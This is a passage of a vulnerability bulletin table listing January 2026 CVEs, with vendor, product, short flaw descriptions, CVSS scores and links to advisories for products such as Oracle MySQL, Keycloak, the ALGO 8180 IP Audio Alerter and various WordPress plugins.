| HCL Software--AION | HCL AION version 2 is affected by a Weak Password Policy vulnerability. This can allow the use of easily guessable passwords, potentially resulting in unauthorized access | 2026-01-19 | 3.1 | CVE-2025-55252 | https://support.hcl-software.com/kb_view.do?sys_kb_id=4b92474633de7ad4159a05273e5c7b4b&searchTerm=kb0127995# |
| HCL Software--AION | HCL AION version 2 is affected by a Cacheable HTTP Response vulnerability. This may lead to unintended storage of sensitive or dynamic content, potentially resulting in unauthorized access or information disclosure. | 2026-01-19 | 2.8 | CVE-2025-52659 | https://support.hcl-software.com/kb_view.do?sys_kb_id=4b92474633de7ad4159a05273e5c7b4b&searchTerm=kb0127995# |
| HCL Software--AION | HCL AION is affected by an Unrestricted File Upload vulnerability. This can allow malicious file uploads, potentially resulting in unauthorized code execution or system compromise. | 2026-01-19 | 2.7 | CVE-2025-52660 | https://support.hcl-software.com/kb_view.do?sys_kb_id=4b92474633de7ad4159a05273e5c7b4b&searchTerm=kb0127995# |
| HCL Software--AION | HCL AION version 2 is affected by a JWT Token Expiry Too Long vulnerability. This may increase the risk of token misuse, potentially resulting in unauthorized access if the token is compromised. | 2026-01-19 | 2.4 | CVE-2025-52661 | https://support.hcl-software.com/kb_view.do?sys_kb_id=4b92474633de7ad4159a05273e5c7b4b&searchTerm=kb0127995# |
| HCL Software--AION | HCL AION version 2 is affected by a Technical Error Disclosure vulnerability. This can expose sensitive technical details, potentially resulting in information disclosure or aiding further attacks. | 2026-01-19 | 1.8 | CVE-2025-55250 | https://support.hcl-software.com/kb_view.do?sys_kb_id=4b92474633de7ad4159a05273e5c7b4b&searchTerm=kb0127995# |
| IBM--ApplinX | IBM ApplinX 11.1 could allow an authenticated user to perform unauthorized administrative actions on the server due to server-side enforcement of client-side security. | 2026-01-20 | 3.1 | CVE-2025-36410 | https://www.ibm.com/support/pages/node/7257446 |
| IBM--ApplinX | IBM ApplinX 11.1 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. | 2026-01-20 | 3.5 | CVE-2025-36411 | https://www.ibm.com/support/pages/node/7257446 |
| lcg0124--BootDo | A weakness has been identified in lcg0124 BootDo up to e93dd428ef6f5c881aa74d49a2099ab0cf1e0fcb. Affected is the function Save of the file /blog/bContent/save of the component ContentController. This manipulation of the argument content/author/title causes cross site scripting. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. | 2026-01-19 | 3.5 | CVE-2026-1136 | VDB-341726 | lcg0124 BootDo ContentController save cross site scripting VDB-341726 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #735164 | BootDo V1.0 Cross Site Scripting https://github.com/webzzaa/CVE-/issues/4 |
| lcg0124--BootDo | A vulnerability was determined in lcg0124 BootDo up to 5ccd963c74058036b466e038cff37de4056c1600. Affected by this vulnerability is the function redirectToLogin of the file AccessControlFilter.java of the component Host Header Handler. This manipulation of the argument Hostname causes open redirect. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. | 2026-01-25 | 3.5 | CVE-2026-1406 | VDB-342794 | lcg0124 BootDo Host Header AccessControlFilter.java redirectToLogin VDB-342794 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #736271 | BootDo web V1.0 Host header injection https://github.com/webzzaa/CVE-/issues/5 |
| libexpat project--libexpat | In libexpat before 2.7.4, XML_ExternalEntityParserCreate does not copy unknown encoding handler user data. | 2026-01-23 | 2.9 | CVE-2026-24515 | https://github.com/libexpat/libexpat/pull/1131 |
| lobehub--lobe-chat | LobeChat is an open source chat application platform. Prior to version 2.0.0-next.193, `knowledgeBase.removeFilesFromKnowledgeBase` tRPC ep allows authenticated users to delete files from any knowledge base without verifying ownership. `userId` filter in the database query is commented out, so it's enabling attackers to delete other users' KB files if they know the knowledge base ID and file ID. While the vulnerability is confirmed, practical exploitation requires knowing target's KB ID and target's file ID. These IDs are random and not easily enumerable. However, IDs may leak through shared links, logs, referrer headers and so on. Missing authorization check is a critical security flaw regardless. Users should upgrade to version 2.0.0-next.193 to receive a patch. | 2026-01-19 | 3.7 | CVE-2026-23522 | https://github.com/lobehub/lobe-chat/security/advisories/GHSA-j7xp-4mg9-x28r https://github.com/lobehub/lobe-chat/commit/2c1762b85acb84467ed5e799afe1499cd2f912e6 |
| MineAdmin--MineAdmin | A security vulnerability has been detected in MineAdmin 1.x/2.x. Affected is an unknown function of the file /system/getFileInfoById. Such manipulation of the argument ID leads to information disclosure. It is possible to launch the attack remotely. The attack requires a high level of complexity. The exploitability is told to be difficult. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-20 | 3.1 | CVE-2026-1196 | VDB-341781 | MineAdmin getFileInfoById information disclosure VDB-341781 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #734273 | MineAdmin MineAdmin Enterprise Backend Management System MineAdmin v1.x MineAdmin v2.x getFileInfoById Arbitrary File Read Vulnerability https://github.com/SourByte05/MineAdmin-Vulnerability/issues/3 |
| MineAdmin--MineAdmin | A vulnerability was detected in MineAdmin 1.x/2.x. Affected by this vulnerability is an unknown functionality of the file /system/downloadById. Performing a manipulation of the argument ID results in information disclosure. The attack can be initiated remotely. The attack's complexity is rated as high. The exploitation appears to be difficult. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-20 | 3.1 | CVE-2026-1197 | VDB-341782 | MineAdmin downloadById information disclosure VDB-341782 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #734274 | MineAdmin MineAdmin Enterprise Backend Management System MineAdmin v1.x MineAdmin v2.x downloadById Arbitrary File Download Vulnerability https://github.com/SourByte05/MineAdmin-Vulnerability/issues/2 |
| Oracle Corporation--MySQL Server | Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Pluggable Auth). Supported versions that are affected are 9.0.0-9.5.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Server. CVSS 3.1 Base Score 2.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L). | 2026-01-20 | 2.7 | CVE-2026-21965 | Oracle Advisory |
| Oracle Corporation--Oracle Java SE | Vulnerability in Oracle Java SE (component: JavaFX). Supported versions that are affected are Oracle Java SE: 8u471-b50. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N). | 2026-01-20 | 3.1 | CVE-2026-21947 | Oracle Advisory |
| Oracle Corporation--Oracle Zero Data Loss Recovery Appliance Software | Vulnerability in the Oracle Zero Data Loss Recovery Appliance Software product of Oracle Zero Data Loss Recovery Appliance (component: Security). Supported versions that are affected are 23.1.0-23.1.202509. Difficult to exploit vulnerability allows unauthenticated attacker with network access via Oracle Net to compromise Oracle Zero Data Loss Recovery Appliance Software. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Zero Data Loss Recovery Appliance Software accessible data. CVSS 3.1 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N). | 2026-01-20 | 3.1 | CVE-2026-21977 | Oracle Advisory |
| Oracle Corporation--Oracle ZFS Storage Appliance Kit | Vulnerability in the Oracle ZFS Storage Appliance Kit product of Oracle Systems (component: Filesystems). The supported version that is affected is 8.8. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle ZFS Storage Appliance Kit executes to compromise Oracle ZFS Storage Appliance Kit. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle ZFS Storage Appliance Kit accessible data. CVSS 3.1 Base Score 2.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N). | 2026-01-20 | 2.3 | CVE-2026-21930 | Oracle Advisory |
| pbrong--hrms | A vulnerability was detected in pbrong hrms 1.0.1. The affected element is the function UpdateRecruitmentById of the file /handler/recruitment.go. The manipulation results in cross site scripting. The attack may be launched remotely. The exploit is now public and may be used. | 2026-01-19 | 3.5 | CVE-2026-1161 | VDB-341755 | pbrong hrms recruitment.go UpdateRecruitmentById cross site scripting VDB-341755 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #736510 | Pbrong hrms 1.0.1 Stored Cross Site Scripting Vulnerability https://github.com/TheLiao233/cve/issues/1 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in the Keycloak server during refresh token processing, specifically in the TokenManager class responsible for enforcing refresh token reuse policies. When strict refresh token rotation is enabled, the validation and update of refresh token usage are not performed atomically. This allows concurrent refresh requests to bypass single-use enforcement and issue multiple access tokens from the same refresh token. As a result, Keycloak's refresh token rotation hardening can be undermined. | 2026-01-21 | 3.1 | CVE-2026-1035 | https://access.redhat.com/security/cve/CVE-2026-1035 RHBZ#2430314 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in the Keycloak Admin REST API. This vulnerability allows the exposure of backend schema and rules, potentially leading to targeted attacks or privilege escalation via improper access control. | 2026-01-21 | 2.7 | CVE-2025-14083 | https://access.redhat.com/security/cve/CVE-2025-14083 RHBZ#2419086 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in glib. Missing validation of offset and count parameters in the g_buffered_input_stream_peek() function can lead to an integer overflow during length calculation. When specially crafted values are provided, this overflow results in an incorrect size being passed to memcpy(), triggering a buffer overflow. This can cause application crashes, leading to a Denial of Service (DoS). | 2026-01-21 | 3.7 | CVE-2026-0988 | https://access.redhat.com/security/cve/CVE-2026-0988 RHBZ#2429886 |
| roxnor--MetForm Contact Form, Survey, Quiz, & Custom Form Builder for Elementor | The MetForm - Contact Form, Survey, Quiz, & Custom Form Builder for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 4.1.0. This is due to the use of a forgeable cookie value derived only from the entry ID and current user ID without a server-side secret. This makes it possible for unauthenticated attackers to access form submission entry data via MetForm shortcodes for entries created within the transient TTL (default is 15 minutes). | 2026-01-24 | 3.7 | CVE-2026-0633 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d72cc420-1ff5-403b-b4ea-7c820fdebcf3?source=cve https://plugins.trac.wordpress.org/changeset/3438419/metform |
| SourceCodester--Patients Waiting Area Queue Management System | A vulnerability has been found in SourceCodester/Patrick Mvuma Patients Waiting Area Queue Management System 1.0. Affected by this issue is some unknown functionality of the file /php/api_register_patient.php. Such manipulation of the argument firstName/lastName leads to cross site scripting. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. | 2026-01-19 | 3.5 | CVE-2026-1146 | VDB-341739 | SourceCodester/Patrick Mvuma Patients Waiting Area Queue Management System api_register_patient.php cross site scripting VDB-341739 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #735543 | Patrick Mvuma Patients Waiting Area Queue Management System 1.0 Cross Site Scripting |
| SourceCodester--Patients Waiting Area Queue Management System | A vulnerability was found in SourceCodester/Patrick Mvuma Patients Waiting Area Queue Management System 1.0. This affects an unknown part of the file /php/api_patient_schedule.php. Performing a manipulation of the argument Reason results in cross site scripting. It is possible to initiate the attack remotely. The exploit has been made public and could be used. | 2026-01-19 | 3.5 | CVE-2026-1147 | VDB-341740 | SourceCodester/Patrick Mvuma Patients Waiting Area Queue Management System api_patient_schedule.php cross site scripting VDB-341740 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #735544 | Patrick Mvuma Patients Waiting Area Queue Management System 1.0 Cross Site Scripting |
| technical-laohu--mpay | A weakness has been identified in technical-laohu mpay up to 1.2.4. The affected element is an unknown function of the component User Center. This manipulation of the argument Nickname causes cross site scripting. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. | 2026-01-19 | 2.4 | CVE-2026-1151 | VDB-341744 | technical-laohu mpay User Center cross site scripting VDB-341744 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #735773 | https://gitee.com/technical-laohu/mpay mpay v1.2.4 Stored Cross-Site Scripting https://github.com/bdkuzma/vuln/issues/16 |
Severity Not Yet Assigned
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| 7-Zip--7-Zip | 7-Zip ZIP File Parsing Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of 7-Zip. Interaction with this product is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The specific flaw exists within the handling of symbolic links in ZIP files. Crafted data in a ZIP file can cause the process to traverse to unintended directories. An attacker can leverage this vulnerability to execute code in the context of a service account. Was ZDI-CAN-26743. | 2026-01-23 | not yet calculated | CVE-2025-11002 | ZDI-25-950 |
| AA-Team--SearchAzon | Cross-Site Request Forgery (CSRF) vulnerability in AA-Team SearchAzon searchazon allows Cross Site Request Forgery. This issue affects SearchAzon: from n/a through <= 1.4. | 2026-01-22 | not yet calculated | CVE-2026-22360 | https://patchstack.com/database/Wordpress/Plugin/searchazon/vulnerability/wordpress-searchazon-plugin-1-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| AA-Team--Wordpress Movies Bulk Importer | Cross-Site Request Forgery (CSRF) vulnerability in AA-Team Wordpress Movies Bulk Importer movies importer allows Cross Site Request Forgery. This issue affects Wordpress Movies Bulk Importer: from n/a through <= 1.0. | 2026-01-22 | not yet calculated | CVE-2026-22359 | https://patchstack.com/database/Wordpress/Plugin/movies%20importer/vulnerability/wordpress-wordpress-movies-bulk-importer-plugin-1-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Abacre--Abacre | Abacre Retail Point of Sale 14.0.0.396 is vulnerable to content-based blind SQL injection. The vulnerability exists in the Search function of the Orders page. | 2026-01-20 | not yet calculated | CVE-2025-67261 | https://www.abacre.com/retailpointofsale/ https://packetstorm.news/files/id/214046/ |
| Abacre--Abacre | Abacre Retail Point of Sale 14.0.0.396 is affected by a stored cross-site scripting (XSS) vulnerability in the Clients module. The application fails to properly sanitize user-supplied input stored in the Name and Surname fields. An attacker can insert malicious HTML or script content into these fields, which, persisted in the database. | 2026-01-20 | not yet calculated | CVE-2025-67263 | https://www.abacre.com/retailpointofsale/ https://packetstorm.news/files/id/214045/ |
| ABCdatos--Proteccin de datos – RGPD | Missing Authorization vulnerability in ABCdatos Protección de datos – RGPD proteccion-datos-rgpd allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Protección de datos – RGPD: from n/a through <= 0.68. | 2026-01-23 | not yet calculated | CVE-2026-24539 | https://patchstack.com/database/Wordpress/Plugin/proteccion-datos-rgpd/vulnerability/wordpress-proteccion-de-datos-rgpd-plugin-0-68-broken-access-control-vulnerability?_s_id=cve |
| Ability, Inc--Web Accessibility with Max Access | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ability, Inc Web Accessibility with Max Access accessibility-toolbar allows Stored XSS. This issue affects Web Accessibility with Max Access: from n/a through <= 2.1.0. | 2026-01-23 | not yet calculated | CVE-2026-24629 | https://patchstack.com/database/Wordpress/Plugin/accessibility-toolbar/vulnerability/wordpress-web-accessibility-with-max-access-plugin-2-1-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| AbsolutePlugins--Absolute Addons For Elementor | Missing Authorization vulnerability in AbsolutePlugins Absolute Addons For Elementor absolute-addons allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Absolute Addons For Elementor: from n/a through <= 1.0.14. | 2026-01-22 | not yet calculated | CVE-2026-22468 | https://patchstack.com/database/Wordpress/Plugin/absolute-addons/vulnerability/wordpress-absolute-addons-for-elementor-plugin-1-0-14-broken-access-control-vulnerability?_s_id=cve |
| adamlabs--WordPress Photo Gallery | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in adamlabs WordPress Photo Gallery photo-gallery-portfolio allows Reflected XSS. This issue affects WordPress Photo Gallery: from n/a through <= 1.1.0. | 2026-01-22 | not yet calculated | CVE-2025-53240 | https://patchstack.com/database/Wordpress/Plugin/photo-gallery-portfolio/vulnerability/wordpress-wordpress-photo-gallery-plugin-1-1-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| agmorpheus--Syntax Highlighter Compress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in agmorpheus Syntax Highlighter Compress syntax-highlighter-compress allows Reflected XSS. This issue affects Syntax Highlighter Compress: from n/a through <= 3.0.83.3. | 2026-01-22 | not yet calculated | CVE-2025-68859 | https://patchstack.com/database/Wordpress/Plugin/syntax-highlighter-compress/vulnerability/wordpress-syntax-highlighter-compress-plugin-3-0-83-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| AivahThemes--Anona | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in AivahThemes Anona anona allows Path Traversal. This issue affects Anona: from n/a through <= 8.0. | 2026-01-22 | not yet calculated | CVE-2025-68901 | https://patchstack.com/database/Wordpress/Theme/anona/vulnerability/wordpress-anona-theme-8-0-arbitrary-file-deletion-vulnerability?_s_id=cve |
| AivahThemes--Anona | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in AivahThemes Anona anona allows Path Traversal. This issue affects Anona: from n/a through <= 8.0. | 2026-01-22 | not yet calculated | CVE-2025-68902 | https://patchstack.com/database/Wordpress/Theme/anona/vulnerability/wordpress-anona-theme-8-0-arbitrary-file-download-vulnerability?_s_id=cve |
| AivahThemes--Anona | Deserialization of Untrusted Data vulnerability in AivahThemes Anona anona allows Object Injection. This issue affects Anona: from n/a through <= 8.0. | 2026-01-22 | not yet calculated | CVE-2025-68903 | https://patchstack.com/database/Wordpress/Theme/anona/vulnerability/wordpress-anona-theme-8-0-php-object-injection-vulnerability?_s_id=cve |
| AivahThemes--Hostme v2 | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in AivahThemes Hostme v2 hostmev2 allows Path Traversal. This issue affects Hostme v2: from n/a through <= 7.0. | 2026-01-22 | not yet calculated | CVE-2025-68907 | https://patchstack.com/database/Wordpress/Theme/hostmev2/vulnerability/wordpress-hostme-v2-theme-7-0-arbitrary-file-deletion-vulnerability?_s_id=cve |
| Alejandro--Quick Restaurant Reservations | Missing Authorization vulnerability in Alejandro Quick Restaurant Reservations quick-restaurant-reservations allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Quick Restaurant Reservations: from n/a through <= 1.6.7. | 2026-01-23 | not yet calculated | CVE-2026-24529 | https://patchstack.com/database/Wordpress/Plugin/quick-restaurant-reservations/vulnerability/wordpress-quick-restaurant-reservations-plugin-1-6-7-broken-access-control-vulnerability?_s_id=cve |
| ALGO--8180 IP Audio Alerter | ALGO 8180 IP Audio Alerter Ping Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is required to exploit this vulnerability. The specific flaw exists within the web-based user interface. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-25568. | 2026-01-23 | not yet calculated | CVE-2026-0779 | ZDI-26-001 |
| ALGO--8180 IP Audio Alerter | ALGO 8180 IP Audio Alerter Web UI Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is required to exploit this vulnerability. The specific flaw exists within the web-based user interface. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-28289. | 2026-01-23 | not yet calculated | CVE-2026-0780 | ZDI-26-002 |
| ALGO--8180 IP Audio Alerter | ALGO 8180 IP Audio Alerter Web UI Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is required to exploit this vulnerability. The specific flaw exists within the web-based user interface. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-28290. | 2026-01-23 | not yet calculated | CVE-2026-0781 | ZDI-26-003 |
| ALGO--8180 IP Audio Alerter | ALGO 8180 IP Audio Alerter Web UI Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is required to exploit this vulnerability. The specific flaw exists within the web-based user interface. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-28291. | 2026-01-23 | not yet calculated | CVE-2026-0782 | ZDI-26-004 |
| ALGO--8180 IP Audio Alerter | ALGO 8180 IP Audio Alerter Web UI Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is required to exploit this vulnerability. The specific flaw exists within the web-based user interface. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-28292. | 2026-01-23 | not yet calculated | CVE-2026-0783 | ZDI-26-005 |
| ALGO--8180 IP Audio Alerter | ALGO 8180 IP Audio Alerter Web UI Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is required to exploit this vulnerability. The specific flaw exists within the web-based user interface. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-28293. | 2026-01-23 | not yet calculated | CVE-2026-0784 | ZDI-26-006 |
| ALGO--8180 IP Audio Alerter | ALGO 8180 IP Audio Alerter API Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is required to exploit this vulnerability. The specific flaw exists within the API interface. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-28294. | 2026-01-23 | not yet calculated | CVE-2026-0785 | ZDI-26-007 |
| ALGO--8180 IP Audio Alerter | ALGO 8180 IP Audio Alerter SCI Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is required to exploit this vulnerability. The specific flaw exists within the SCI module. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-28295. | 2026-01-23 | not yet calculated | CVE-2026-0786 | ZDI-26-008 |
| ALGO--8180 IP Audio Alerter | ALGO 8180 IP Audio Alerter SAC Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the SAC module. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-28296. | 2026-01-23 | not yet calculated | CVE-2026-0787 | ZDI-26-009 |
| ALGO--8180 IP Audio Alerter | ALGO 8180 IP Audio Alerter Web UI Persistent Cross-Site Scripting Vulnerability. This vulnerability allows remote attackers to execute web requests with a target user's privileges on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the functionality for viewing the syslog. The issue results from the lack of proper validation of user-supplied data, which can lead to the injection of an arbitrary script. An attacker can leverage this vulnerability to interact with the application in the context of the target user. Was ZDI-CAN-28298. | 2026-01-23 | not yet calculated | CVE-2026-0788 | ZDI-26-010 |
| ALGO--8180 IP Audio Alerter | ALGO 8180 IP Audio Alerter Web UI Inclusion of Authentication Cookie in Response Body Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web-based user interface. The issue results from the lack of proper management of sensitive information. An attacker can leverage this vulnerability to disclose information in the context of the device. Was ZDI-CAN-28297. | 2026-01-23 | not yet calculated | CVE-2026-0789 | ZDI-26-011 |
| ALGO--8180 IP Audio Alerter | ALGO 8180 IP Audio Alerter Web UI Direct Request Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web-based user interface. By navigating directly to a URL, a user can gain unauthorized access to data. An attacker can leverage this vulnerability to disclose information in the context of the device. Was ZDI-CAN-28299. | 2026-01-23 | not yet calculated | CVE-2026-0790 | ZDI-26-012 |
| ALGO--8180 IP Audio Alerter | ALGO 8180 IP Audio Alerter SIP INVITE Replaces Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the Replaces header of SIP INVITE requests. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-28300. | 2026-01-23 | not yet calculated | CVE-2026-0791 | ZDI-26-013 |
| ALGO--8180 IP Audio Alerter | ALGO 8180 IP Audio Alerter SIP INVITE Alert-Info Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the Alert-Info header of SIP INVITE requests. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-28301. | 2026-01-23 | not yet calculated | CVE-2026-0792 | ZDI-26-014 |
| ALGO--8180 IP Audio Alerter | ALGO 8180 IP Audio Alerter InformaCast Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the InformaCast functionality. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-28302. | 2026-01-23 | not yet calculated | CVE-2026-0793 | ZDI-26-015 |
| ALGO--8180 IP Audio Alerter | ALGO 8180 IP Audio Alerter SIP Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of SIP calls. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-28303. | 2026-01-23 | not yet calculated | CVE-2026-0794 | ZDI-26-016 |
| ALGO--8180 IP Audio Alerter | ALGO 8180 IP Audio Alerter Web UI Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is required to exploit this vulnerability. The specific flaw exists within the web-based user interface. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-28321. | 2026-01-23 | not yet calculated | CVE-2026-0795 | ZDI-26-017 |
| ALGO--8180 IP Audio Alerter | ALGO 8180 IP Audio Alerter Web UI Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of ALGO 8180 IP Audio Alerter devices. Authentication is required to exploit this vulnerability. The specific flaw exists within the web-based user interface. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-28322. | 2026-01-23 | not yet calculated | CVE-2026-0796 | ZDI-26-018 |
| AmentoTech--Workreap Core | Authentication Bypass Using an Alternate Path or Channel vulnerability in AmentoTech Workreap Core workreap_core allows Authentication Abuse. This issue affects Workreap Core: from n/a through <= 3.4.0. | 2026-01-22 | not yet calculated | CVE-2025-69101 | https://patchstack.com/database/Wordpress/Plugin/workreap_core/vulnerability/wordpress-workreap-core-plugin-3-4-0-account-takeover-vulnerability?_s_id=cve |
| AncoraThemes--DiveIt | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes DiveIt diveit allows PHP Local File Inclusion. This issue affects DiveIt: from n/a through <= 1.4.3. | 2026-01-22 | not yet calculated | CVE-2025-69059 | https://patchstack.com/database/Wordpress/Theme/diveit/vulnerability/wordpress-diveit-theme-1-4-3-local-file-inclusion-vulnerability?_s_id=cve |
